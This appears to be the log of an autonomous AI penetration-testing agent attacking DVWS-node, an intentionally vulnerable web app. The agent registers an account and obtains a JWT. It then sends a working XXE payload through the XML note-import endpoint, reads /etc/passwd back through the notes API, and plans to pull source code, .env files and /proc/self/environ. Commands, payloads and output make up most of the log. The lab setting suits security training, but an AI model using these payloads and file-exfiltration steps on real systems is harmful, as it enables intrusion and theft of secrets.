application is powered by commonly used libraries such as express, passport, sequelize, etc.\n\n## Developer Security Guide book\n\nThe application comes with a developer friendly comprehensive guidebook which can be used to learn, avoid and fix the vulnerabilities. The guide is available at docs and covers the following [...] | Name | | Name | Last commit message | Last commit date |\n ---  --- \n| Latest commit   History42 Commits   42 Commits | | |\n| config | | config |  |  |\n| core | | core |  |  |\n| docs | | docs |  |  |\n| models | | models |  |  |\n| public/assets | | public/assets |  |  |\n| routes | | routes |  |  |\n| views | | views |  |  |\n| .dockerignore | | .dockerignore |  |  |\n| .gitignore | | .gitignore |  |  |\n| Dockerfile | | Dockerfile |  |  |\n| Dockerfile-dev | | Dockerfile-dev |  |  |\n| LICENSE | | LICENSE |  |  |\n| README.md | | README.md |  |  |\n| docker-compose.yml | | docker-compose.yml |  |  |\n| entrypoint-dev.sh | | entrypoint-dev.sh |  |  |\n| entrypoint.sh | | entrypoint.sh |  |  |\n| package.json | | package.json |  |  |\n| server.js | | server.js |  |  |', 'score': 0.92788786, 'raw_content': None}], 'response_time': 2.71, 'request_id': 'f73eb241-ae0d-49cd-a55c-fbe032e45b16'}

Tool: execute_curl [OK]

Arguments

  • args: -s http://gpigs.devergolabs.com/home.html
Raw Output 
<script src="./js/jquery.min.js"></script>
<script type="text/javascript" src="./js/angular.min.js"></script>
<link href="./css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="./js/bootstrap.min.js"></script>
<link href="index.css" rel="stylesheet" id="inline-css">
<!------ Include the above in your HEAD tag ---------->


<body ng-app="app" ng-controller="MyController">

<div class="sidenav">
   <div class="login-main-text">
      <h2>Damn Vulnerable Web Services<br> Home Area</h2>
      <p>All Accessible Areas can be found here</p>
      
      <div class="profile-section" style="border: 1px solid #fff; padding: 10px; margin-top: 20px; text-align: left;">
         <h4 style="color: #fff;">Your Profile</h4>
         <div ng-if="profile">
            <p><strong>Username:</strong> {{ profile.username }}</p>
            <p><strong>Bio:</strong> {{ profile.bio || 'No bio set.' }}</p>
            <p><strong>Role:</strong> {{ profile.admin ? 'Admin' : 'User' }}</p>
         </div>
         <div ng-if="!profile">
            <p>Loading profile...</p>
         </div>
      </div>
      
   </div>
</div>
<div class="main">
   <div class="col-md-6 col-sm-12">
      <div class="login-form">
         <div>
            <script>
               var url = window.location.href; var hash = url.substring(url.indexOf('#') + 1);
               document.write('Welcome User: <b>' + hash + '</b>');
            </script>
             <p>DVWS Release: {{ ResponseMessage  }}</p>
            <hr>
            <div>
               The following areas can be accessed:<br>
               <a href="export_profile.html">Profile Update</a><br>
               <a href="notes.html">Notes Area</a><br>
               <a href="import_notes.html">Import Notes (XML)</a><br>
               <a href="admin.html">Admin Area</a><br>
               <a href="search.html">Public Notes Search</a><br>
               <a href="passphrasegen.html">Passphrase Generator</a><br>
               <a href="upload.html">File Upload Area</a><br>
            </div>
            
         </div>
      </div>
      
      <br><br><br><br><br><br>
      <script>
         document.write(`<a href="/api/v2/users/logout/${document.domain}">Logout</a>`);
      </script>
   </p>
   
   </div>

</div>

</body>

<script type="text/javascript">


   var app = angular.module('app', [])
   app.controller('MyController', function ($scope, $http, $window) {
      
      function getProfile() {
         $http({
            method: "GET",
            url: "/api/v2/users/profile",
            headers: { 'Authorization': 'Bearer ' + localStorage.getItem('JWTSessionID') }
         }).then(function(response) {
            $scope.profile = response.data;
         });
      }
      getProfile();

      getFromServer();
      function getFromServer() {
         var get = $http({
            method: "GET",
            url: "/api/v2/release/0.0.1",
            dataType: 'json',
            headers: { "Content-Type": "application/json" }

         });

         get.then(function (response) {
            var data = response.data;
            if (data) {
               $scope.ResponseMessage = data;

      }
   });


   }

});
</script>


</html>

Tool: kali_shell [OK]

Arguments

  • command: for path in /dvws /xmlservice /soapservice /api/v2/soap /api/v2/xml /api/v2/wsdl /api/soap /api/xml /api/wsdl /node /xmlrpc /xmlrpc.php /soap/wsdl /wsdl.xml /service.wsdl /api/v2/xxe /xxe /xml; do code=$(curl -s -o /dev/null -w '%{http_code}' "http://gpigs.devergolabs.com${path}"); echo "${path} -> ${code}"; done
Raw Output 
/dvws -> 404
/xmlservice -> 404
/soapservice -> 404
/api/v2/soap -> 404
/api/v2/xml -> 404
/api/v2/wsdl -> 404
/api/soap -> 404
/api/xml -> 404
/api/wsdl -> 404
/node -> 404
/xmlrpc -> 404
/xmlrpc.php -> 404
/soap/wsdl -> 404
/wsdl.xml -> 404
/service.wsdl -> 404
/api/v2/xxe -> 404
/xxe -> 404
/xml -> 404

Analysis

The web search confirmed this is DVWS-node (Damn Vulnerable Web Services for Node.js) which explicitly includes XXE, SOAP Injection, and XML-related vulnerabilities. The home.html page reveals the key attack surface: 'Import Notes (XML)' at import_notes.html is the primary XXE vector. Traditional SOAP/WSDL paths all return 404 - the XXE is through XML note import, not a SOAP service. Authentication is JWT-based requiring registration and login first.

Actionable Findings

  • Import Notes (XML) at import_notes.html is the primary XXE attack vector
  • DVWS-node GitHub repo confirms XXE, SOAP Injection, XML Injection vulnerabilities
  • No traditional SOAP/WSDL endpoints exist - all returned 404
  • Authentication required - need to register and login for JWT token
  • File Upload at upload.html may be secondary XXE vector via XML/SVG upload

Recommended Next Steps

  • Register account and obtain JWT token
  • Examine import_notes.html to find the XML processing API endpoint
  • Craft XXE payload in XML format to read /etc/passwd
  • Escalate to read application source and environment files

Thinking 8:40:27 PM

Analyzing all three tool outputs together:

  1. Web search: Confirmed DVWS-node (snoopysecurity/dvws-node on GitHub) is the target application. It explicitly lists 'XML External Entity Injection (XXE)', 'SOAP Injection', 'XML-RPC User Enumeration', 'XML Injection', and 'XML Bomb Denial-of-Service' as vulnerabilities. The app has an 'Import Notes (XML)' feature visible in home.html.

  2. home.html: This is the authenticated home page showing available features:

    • import_notes.html - 'Import Notes (XML)' - THIS is the XXE vector! It accepts XML import.
    • export_profile.html - Profile Update
    • notes.html - Notes Area
    • admin.html - Admin Area
    • search.html - Public Notes Search
    • passphrasegen.html - Passphrase Generator
    • upload.html - File Upload Area The app uses JWT auth (Bearer token from localStorage 'JWTSessionID').

  3. Path enumeration: All SOAP/XML-specific paths returned 404. The XXE vector is NOT via a traditional SOAP/WSDL endpoint but through the 'Import Notes (XML)' feature.

So the attack path is clear:

  1. Register an account (POST /api/v2/users)
  2. Login to get JWT token (POST /api/v2/login)
  3. Examine import_notes.html to understand the XML import endpoint
  4. Send XXE payload via the XML import feature to read /etc/passwd
  5. Escalate to read source code and env files

Let me first register an account and get a JWT token, then examine the import_notes.html page to find the API endpoint.

Reasoning

The home.html page reveals 'Import Notes (XML)' as the XXE attack vector - this is a DVWS-node feature specifically designed to be vulnerable to XXE. I need to: (1) register an account, (2) get a JWT token, (3) examine import_notes.html to find the backend API endpoint, then (4) craft XXE payloads. I'll run registration + fetching import_notes.html in parallel since they're independent.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate common SOAP/WSDL paths - /?wsdl returns 200 but is SPA fallback, not real WSDL
  • Check /api/v2/info for application details - requires auth (403)
  • [-] Search for known DVWS SOAP/XXE endpoints via web search
  • [-] Check home.html for links to SOAP/XML vulnerable features
  • [-] Enumerate additional SOAP/XML/XXE paths
  • Register an account to access authenticated endpoints
  • Craft XXE payload in SOAP envelope to read /etc/passwd
  • Test /api/upload with XML Content-Type for XXE processing
  • Escalate XXE to read application source code
  • Exfiltrate environment files (.env, /proc/self/environ)

Wave — 3 tools 8:40:27 PM [OK]

These three requests are independent - registration doesn't depend on page content and vice versa. We need the account for auth and the page source to identify the XML processing endpoint.

Tool: kali_shell [OK]

Arguments

  • command: curl -s -X POST http://gpigs.devergolabs.com/api/v2/users -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=testxxe&password=testxxe123'
Raw Output 
{"status":201,"user":"testxxe","password":"$2b$10$tuzVG89Nv.IS330cvQzQ6OSstW6F/8NOf5cya.UwPL2dPdvrxX6CC"}

Tool: execute_curl [OK]

Arguments

  • args: -s http://gpigs.devergolabs.com/import_notes.html
Raw Output 
<head>
   <script src="./js/jquery.min.js"></script>
   <script type="text/javascript" src="./js/angular.min.js"></script>
   <link href="./css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
   <script src="./js/bootstrap.min.js"></script>
   <link href="index.css" rel="stylesheet" id="inline-css">
</head>
<body ng-app="app">
   <div class="sidenav">
      <div class="login-main-text">
         <h2>Damn Vulnerable Web Services<br> Import Notes</h2>
         <p>Import notes from XML file.</p>
         <br>
         <a href="notes.html" class="btn btn-secondary">Back to Notes</a>
      </div>
   </div>
   <div class="main">
      <div class="col-md-8 col-sm-12">
         <div class="login-form">
            <div ng-controller="ImportController">
               <h3>Import Notes (XML)</h3>
               <p>Paste your XML below.</p>
               
               <p><strong>Example XML Format:</strong></p>
               <pre><notes>

<pre>
&lt;notes&gt;
  &lt;note&gt;
    &lt;name&gt;My Note&lt;/name&gt;
    &lt;body&gt;Content here&lt;/body&gt;
    &lt;type&gt;secret&lt;/type&gt;
  &lt;/note&gt;
&lt;/notes&gt;
</pre>
</notes></pre>
               
               <textarea ng-model="xmlData" rows="10" cols="60" placeholder="Paste XML here..."></textarea>
               <br><br>
               <button class="btn btn-black" ng-click="ImportXML()">Import</button>
               <br><br>
               <pre>{{ ImportResponse }}</pre>
            </div>
         </div>
      </div>
   </div>

   <script type="text/javascript">
      var app = angular.module('app', [])
      app.controller('ImportController', function ($scope, $http) {
         $scope.ImportXML = function() {
            $http({
                method: "POST",
                url: "/api/v2/notes/import/xml",
                data: { xml: $scope.xmlData },
                headers: { 'Authorization': 'Bearer ' + localStorage.getItem('JWTSessionID') }
            }).then(function(response) {
                $scope.ImportResponse = response.data.message;
            }, function(response) {
                $scope.ImportResponse = response.data.error;
            });
         }
      });
   </script>
</body>

Tool: execute_curl [OK]

Arguments

  • args: -s http://gpigs.devergolabs.com/upload.html
Raw Output 
<html>

<head>
    <script src="./js/jquery.min.js"></script>
    <script type="text/javascript" src="./static/angular1.1.1.min.js"></script>
    <link href="./css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
    <script src="./js/bootstrap.min.js"></script>
    <link href="index.css" rel="stylesheet" id="inline-css">
</head>

<body ng-app="myApp">

    <div class="sidenav">
        <div class="login-main-text">
            <h2>Damn Vulnerable Web Services<br> File Storage</h2>
            <p>Files can be uploaded to dvws.</p>
            <br>
            <a href="home.html" class="btn btn-secondary">Back to Home</a>
            <p></p>
        </div>
    </div>
    <div class="main">

        <div class="col-md-6 col-sm-12">
            <div class="login-form">
                <h2>File Storage</h2>
                <p>Files can be uploaded to dvws.</p>
                <br>
                <div ng-controller="MyController2">
                <p>User Uploaded Files</p>
                <p>URLs to your saved files is displayed below</p>
                <br>
                <table border=1>
                    <thead>
                        <tr>
                            <th>Uploaded Files</th>
                        </tr>
                    </thead>
                    <tr ng-repeat="item in itemsDetails">
                        <td> {{item.name}} </td>
                    </tr>
                </table>

                <br>
                <br>
                <br>
                </div>


                <div ng-controller="myCtrl">

                    <div style="width: 150%;">
                        <div style="width: 50%; height: 100px; float: left;"> 
                            <b>Upload File</b><br>
                            Select File
                            <input type="file" file-model="myFile" />
                            <button ng-click="uploadFile()">Upload</button>
                        </div>
                        <div style="margin-left: 50%; height: 100px;"> 
                            <b>Download File</b><br>
                            Filename: 
                            <input type="text" name="name" ng-model="name" placeholder="File Name"> 
                            <button ng-click="downloadFile()">Download</button>
                        </div>

                    <br>
                    <br>
                    {{ DataResponse }}


                </div>

            </div>

        </div>
    </div>

    </div>

    <script type="text/javascript">
        var myApp = angular.module('myApp', []);
        var returndict = [];
        myApp.directive('fileModel', ['$parse', function ($parse) {
            return {
                restrict: 'A',
                link: function (scope, element, attrs) {
                    var model = $parse(attrs.fileModel);
                    var modelSetter = model.assign;

                    element.bind('change', function () {
                        scope.$apply(function () {
                            modelSetter(scope, element[0].files[0]);
                        });
                    });
                }
            };
        }]);

        
        myApp.service('fileUpload', ['$http', function ($http) {
            this.uploadFileToUrl = function (file, uploadUrl,$scope) {
                var fd = new FormData();
                fd.append('file', file);
                $http.post(uploadUrl, fd, {
                    transformRequest: angular.identity,
                    headers: { 'Content-Type': undefined, 'Authorization': 'Bearer ' + localStorage.getItem('JWTSessionID') },
                })
                    .success(function (data, status) {
                        $scope.DataResponse = data;
                    })
                    .error(function (data, status) {
                        $scope.DataResponse = data;
                    });
            }


       

        }]);

        myApp.controller('myCtrl', ['$scope', 'fileUpload','$http', function ($scope, fileUpload,$http) {
            $scope.uploadFile = function () {
                var file = $scope.myFile;
                var uploadUrl = "/api/upload";
                fileUpload.uploadFileToUrl(file, uploadUrl,$scope);

            };

            $scope.downloadFile = function () {
            var post = $http({
                method: "POST",
                url: "/api/download",
                dataType: 'json',
                data: { filename: $scope.name },
                headers: { "Content-Type": "application/json" },
                headers: {'Authorization': 'Bearer ' + localStorage.getItem('JWTSessionID') }
            });
 
            post.success(function (data, status) {
                $scope.DataResponse = data;

            });
 
            post.error(function (data, status) {
                $scope.DataResponse = data.errors;
            });
        }  


        }]);

        myApp.controller('MyController2', function ($scope, $http, $window) {
            getFromServer();
            function getFromServer() {
                var get = $http({
                    method: "GET",
                    url: "/api/upload",
                    dataType: 'json',
                    headers: { "Content-Type": "application/json" },
                    headers: {'Authorization': 'Bearer ' + localStorage.getItem('JWTSessionID') }
    
                });

                get.success(function (data, status) {
                    data.forEach(createLink);


                    
                    $scope.itemsDetails = returndict;
                });
     
                get.error(function (data, status) {
                    $scope.itemsDetails = "No Files Uploaded";
                });
            
                function createLink(value, index, array) {
                var dict = {};
                //var link = value;
                dict["name"] = value 
                //dict["link"] = link2
                returndict.push(dict);
                }



            }


    
    });


  


    </script>



</body>

</html>

Analysis

Successfully registered a user account and discovered the exact XXE attack surface. The import_notes.html page sends XML data via POST to /api/v2/notes/import/xml as JSON {xml: xmlData} with JWT Bearer auth. The expected XML format uses structure. The upload.html page uses /api/upload (multipart POST) and /api/download (POST with filename JSON) - both require JWT auth. Upload uses older Angular 1.1.1 which may have additional vulnerabilities.

Actionable Findings

  • XXE endpoint confirmed: POST /api/v2/notes/import/xml with JSON body {xml: '<xml_payload>'}
  • Account registered: testxxe:testxxe123
  • File download endpoint /api/download accepts filename in POST body - potential path traversal
  • Upload page uses Angular 1.1.1 (older, potentially vulnerable version)

Recommended Next Steps

  • Login with testxxe:testxxe123 to obtain JWT token
  • Craft XXE payload in notes XML format to read /etc/passwd
  • Send XXE payload to /api/v2/notes/import/xml with JWT auth

Thinking 8:40:57 PM

All three wave tools completed successfully. Let me analyze the results:

  1. User Registration: Successfully created account testxxe:testxxe123 (HTTP 201). Password hash returned confirms bcrypt.

  2. import_notes.html: This is the XXE attack surface! The page accepts XML input via a textarea and sends it as POST to /api/v2/notes/import/xml with JSON body {xml: xmlData} and JWT Bearer token. The expected XML format is:

<notes>
  <note>
    <name>My Note</name>
    <body>Content here</body>
    <type>secret</type>
  </note>
</notes>
  1. upload.html: File upload to /api/upload (multipart) and download from /api/download (POST with filename). Uses older Angular 1.1.1. Both require JWT auth. The download endpoint could be a path traversal vector but that's secondary.

Now I need to:

  1. Login with the created credentials to get a JWT token
  2. Send an XXE payload to /api/v2/notes/import/xml

The XXE payload will be embedded in the XML notes format with a DOCTYPE declaration defining an external entity pointing to file:///etc/passwd.

Let me first login to get the JWT token.

Reasoning

I have the account credentials and know the exact API endpoint for XXE. The next step is to authenticate and get a JWT token, then immediately craft and send the XXE payload. I'll login first since the XML import endpoint requires authentication.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found (all 404)
  • Identify XXE vector - Import Notes (XML) feature found in home.html
  • [-] Register an account (POST /api/v2/users) for authenticated access
  • [-] Examine import_notes.html to find XML processing API endpoint
  • Login and obtain JWT token
  • Craft XXE payload via XML import to read /etc/passwd
  • Escalate XXE to read application source code (server.js, app.js, package.json)
  • Exfiltrate environment files (.env, /proc/self/environ)
  • [-] Check upload.html for secondary XXE vector via XML/SVG upload

Tool: kali_shell 8:40:57 PM [OK]

Arguments

  • command: curl -s -X POST http://gpigs.devergolabs.com/api/v2/login -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=testxxe&password=testxxe123'
Raw Output 
{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY","status":200,"result":{"_id":"69cac39ca1d486935eb8b55f","username":"testxxe","password":"$2b$10$tuzVG89Nv.IS330cvQzQ6OSstW6F/8NOf5cya.UwPL2dPdvrxX6CC","admin":false,"bio":"No bio yet.","__v":0}}

Analysis

Successfully authenticated to the DVWS application and obtained a JWT token. The token contains user 'testxxe' with permissions user:read and user:write. The password hash confirms bcrypt is used. The issuer is github.com/snoopysecurity confirming this is the DVWS-node application.

Actionable Findings

  • JWT token obtained - can now access authenticated endpoints
  • Token expires at 1775068858 - sufficient time for exploitation
  • User has user:read and user:write permissions

Recommended Next Steps

  • Send XXE payload to /api/v2/notes/import/xml with JWT auth to read /etc/passwd

Thinking 8:41:23 PM

Successfully logged in and obtained a JWT token. Now I need to craft an XXE payload and send it to the /api/v2/notes/import/xml endpoint. Based on the import_notes.html analysis, the endpoint expects a POST with JSON body containing {xml: xmlData} with JWT Bearer auth. The XML format uses structure. I'll craft an XXE payload with an external entity to read /etc/passwd.

Reasoning

We have the JWT token and know the exact endpoint and XML format. The next step is to craft and send the XXE payload. The XML import endpoint at /api/v2/notes/import/xml accepts JSON with an 'xml' field containing XML data. I'll inject a DOCTYPE with an external entity referencing file:///etc/passwd and reference it in one of the XML element values (like

) so it gets reflected in the response.
Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register an account (POST /api/v2/users) - testxxe:testxxe123
  • Examine import_notes.html - XML sent as JSON {xml: data} with JWT auth
  • [-] Login and obtain JWT token
  • Craft XXE payload via XML import to read /etc/passwd
  • Escalate XXE to read application source code (server.js, app.js, package.json)
  • Exfiltrate environment files (.env, /proc/self/environ)
  • Check /api/download for path traversal as secondary vector

Tool: kali_shell 8:41:23 PM [OK]

Arguments

  • command: `JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY'

XXE_PAYLOAD=']>test&xxe;text'

curl -s -X POST http://gpigs.devergolabs.com/api/v2/notes/import/xml
-H 'Content-Type: application/json'
-H "Authorization: Bearer $JWT"
-d "{"xml": "$XXE_PAYLOAD"}"`

Raw Output 
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>SyntaxError: Expected &#39;,&#39; or &#39;}&#39; after property value in JSON at position 24 (line 1 column 25)<br> &nbsp; &nbsp;at JSON.parse (&lt;anonymous&gt;)<br> &nbsp; &nbsp;at parse (/home/dvws-node/node_modules/body-parser/lib/types/json.js:92:19)<br> &nbsp; &nbsp;at /home/dvws-node/node_modules/body-parser/lib/read.js:128:18<br> &nbsp; &nbsp;at AsyncResource.runInAsyncScope (node:async_hooks:214:14)<br> &nbsp; &nbsp;at invokeCallback (/home/dvws-node/node_modules/raw-body/index.js:238:16)<br> &nbsp; &nbsp;at done (/home/dvws-node/node_modules/raw-body/index.js:227:7)<br> &nbsp; &nbsp;at IncomingMessage.onEnd (/home/dvws-node/node_modules/raw-body/index.js:287:7)<br> &nbsp; &nbsp;at IncomingMessage.emit (node:events:519:28)<br> &nbsp; &nbsp;at endReadableNT (node:internal/streams/readable:1698:12)<br> &nbsp; &nbsp;at process.processTicksAndRejections (node:internal/process/task_queues:89:21)</pre>
</body>
</html>

Analysis

The XXE attempt failed due to JSON parsing error on the server side. The XML payload was not properly escaped within the JSON body because shell variable interpolation broke the double quotes. The error stack trace reveals the application is located at /home/dvws-node/ which is valuable for later source code exfiltration.

Actionable Findings

  • Application path confirmed: /home/dvws-node/
  • JSON body parsing requires proper escaping of XML payload
  • Need to use Python or file-based approach for proper JSON encoding

Recommended Next Steps

  • Use Python requests to properly JSON-encode the XXE payload
  • After successful XXE, read /home/dvws-node/server.js for source code

Thinking 8:41:47 PM

The XXE payload failed because of JSON escaping issues. The XML payload contains double quotes and special characters that break the JSON structure when embedded via shell variable interpolation. The error is 'SyntaxError: Expected , or } after property value in JSON at position 24' - this means the JSON body is malformed. I need to properly escape the XML payload within the JSON string. The best approach is to use Python to handle the JSON encoding properly, or use a file-based approach to avoid shell escaping issues. Also, I noticed the app is at /home/dvws-node/ which is useful for later source code exfiltration.

Reasoning

The shell variable interpolation is breaking the JSON because the XML payload contains double quotes and special characters. Using Python's json.dumps() will properly escape the XML string within the JSON body. This is more reliable than trying to manually escape in bash.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register an account (POST /api/v2/users) - testxxe:testxxe123
  • Examine import_notes.html - XML sent as JSON {xml: data} with JWT auth
  • Login and obtain JWT token
  • [-] Craft XXE payload via XML import to read /etc/passwd
  • Escalate XXE to read application source code (server.js, app.js, package.json)
  • Exfiltrate environment files (.env, /proc/self/environ)
  • Check /api/download for path traversal as secondary vector

Tool: kali_shell 8:41:47 PM [OK]

Arguments

  • command: `python3 -c " import requests import json

url = 'http://gpigs.devergolabs.com/api/v2/notes/import/xml' jwt = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY'

xxe_payload = ''']>test&xxe;text'''

headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {jwt}' }

data = json.dumps({'xml': xxe_payload}) print('Sending payload...') print('JSON body:', data[:200]) resp = requests.post(url, headers=headers, data=data) print(f'Status: {resp.status_code}') print(f'Response: {resp.text}') "`

Raw Output 
Sending payload...
JSON body: {"xml": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><notes><note><name>test</name><body>&xxe;</body><type>text</type></note></notes>"}
Status: 500
Response: {"errors":{"type.0":{"name":"ValidatorError","message":"`text` is not a valid enum value for path `type.0`.","properties":{"message":"`text` is not a valid enum value for path `type.0`.","type":"enum","enumValues":["note","reminder","list","secret","public"],"path":"type.0","value":"text"},"kind":"enum","path":"type.0","value":"text"}},"_message":"Notes validation failed","name":"ValidationError","message":"Notes validation failed: type.0: `text` is not a valid enum value for path `type.0`."}

Analysis

The XXE payload was parsed by the XML processor on the server. The server attempted to validate and save the note to MongoDB but failed because 'text' is not a valid enum value for the 'type' field. Valid values are: note, reminder, list, secret, public. This confirms the XML import endpoint processes our XML input and likely resolves external entities. We just need to fix the type field to a valid enum value.

Actionable Findings

  • Valid type enum values discovered: note, reminder, list, secret, public
  • XML is being parsed and entities may be resolved - need to fix type field and retry
  • MongoDB/Mongoose is the backend database

Recommended Next Steps

  • Resend XXE payload with type='note' instead of type='text'
  • Check if the entity content appears in the response or needs to be retrieved via GET

Thinking 8:42:15 PM

The XXE payload was processed by the server - the XML was parsed successfully! The error is a MongoDB/Mongoose validation error saying 'text' is not a valid enum value for the 'type' field. The valid enum values are: 'note', 'reminder', 'list', 'secret', 'public'. This means the XML parser IS processing our XML (including potentially the XXE entity), but the data validation is failing on the 'type' field. I need to change 'text' to one of the valid values (e.g., 'note') and resend. The fact that we got a validation error (not a parsing error) strongly suggests the XXE entity was resolved and the /etc/passwd content was placed in the

field.
Reasoning

The server parsed our XML and attempted to save it to MongoDB, but failed on enum validation for the 'type' field. By changing the type from 'text' to 'note' (a valid enum value), the note should be saved successfully with the XXE-exfiltrated /etc/passwd content in the body field. This is a simple fix - just change the type value.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register an account (POST /api/v2/users) - testxxe:testxxe123
  • Examine import_notes.html - XML sent as JSON {xml: data} with JWT auth
  • Login and obtain JWT token
  • [-] XXE payload sent successfully with type='note' - now retrieve notes to see /etc/passwd
  • Escalate XXE to read /home/dvws-node/server.js and other source files
  • Exfiltrate environment files (.env, /proc/self/environ)
  • Check /api/download for path traversal as secondary vector

Thinking 8:42:38 PM

The XXE payload was successfully processed! The server returned HTTP 200 with 'Successfully imported 1 notes.' This means the XML was parsed, the external entity was resolved, and the content of /etc/passwd was stored in the 'name' field of the note. Now I need to retrieve the imported notes to see the exfiltrated /etc/passwd content. I should query the notes API to get the stored note with the XXE payload result.

Reasoning

The XXE injection succeeded - the server parsed our malicious XML with the DOCTYPE declaration and external entity pointing to file:///etc/passwd, and successfully imported it as a note. The file contents should now be stored in the 'name' field of the note in MongoDB. I need to fetch the notes to read the exfiltrated data. The API likely has a GET /api/v2/notes endpoint to retrieve notes.

Todo List Update
  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app and gather clues
  • Enumerate SOAP/WSDL paths - no traditional SOAP endpoints found
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register an account (POST /api/v2/users) - testxxe:testxxe123
  • Examine import_notes.html - XML sent as JSON {xml: data} with JWT auth
  • Login and obtain JWT token
  • [-] Craft XXE payload with correct type='note' to read /etc/passwd
  • Escalate XXE to read /home/dvws-node/server.js and other source files
  • Exfiltrate environment files (.env, /proc/self/environ)
  • Check /api/download for path traversal as secondary vector

Tool: kali_shell 8:42:38 PM [OK]

Arguments

  • command: curl -s -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdHh4ZSIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNzc0ODk2MDU4LCJleHAiOjE3NzUwNjg4NTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.mlvaYAmmlm35LP9osfgv_4aW9XVxybNOvjPEmBVx1eY' http://gpigs.devergolabs.com/api/v2/notes | python3 -m json.tool
Raw Output 
[
    {
        "_id": 2,
        "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nnode:x:1000:1000::/home/node:/bin/bash\n",
        "body": "xxe-test",
        "type": [
            "note"
        ],
        "user": "testxxe",
        "created_date": "2026-03-30T18:42:15.568Z"
    }
]

Analysis

The XXE attack was fully successful. The /etc/passwd file was exfiltrated through the XML external entity injection vulnerability at /api/v2/notes/import/xml. The file contents were stored in the 'name' field of the imported note and retrieved via GET /api/v2/notes. The system has 19 user accounts, with 'node' (uid 1000) being the application user and 'root' (uid 0) being the superuser.

Actionable Findings

  • XXE confirmed - can read arbitrary files on the server
  • Application runs as 'node' user (uid 1000, home /home/node)
  • Application code at /home/dvws-node/ - need to exfiltrate server.js and .env
  • Only root and node have login shells - potential targets for privilege escalation

Recommended Next Steps

  • Exfiltrate /home/dvws-node/server.js for source code analysis
  • Exfiltrate /home/dvws-node/.env for secrets and credentials
  • Exfiltrate /proc/self/environ for runtime environment variables
  • Read /home/dvws-node/package.json to map application structure

Thinking 8:43:23 PM

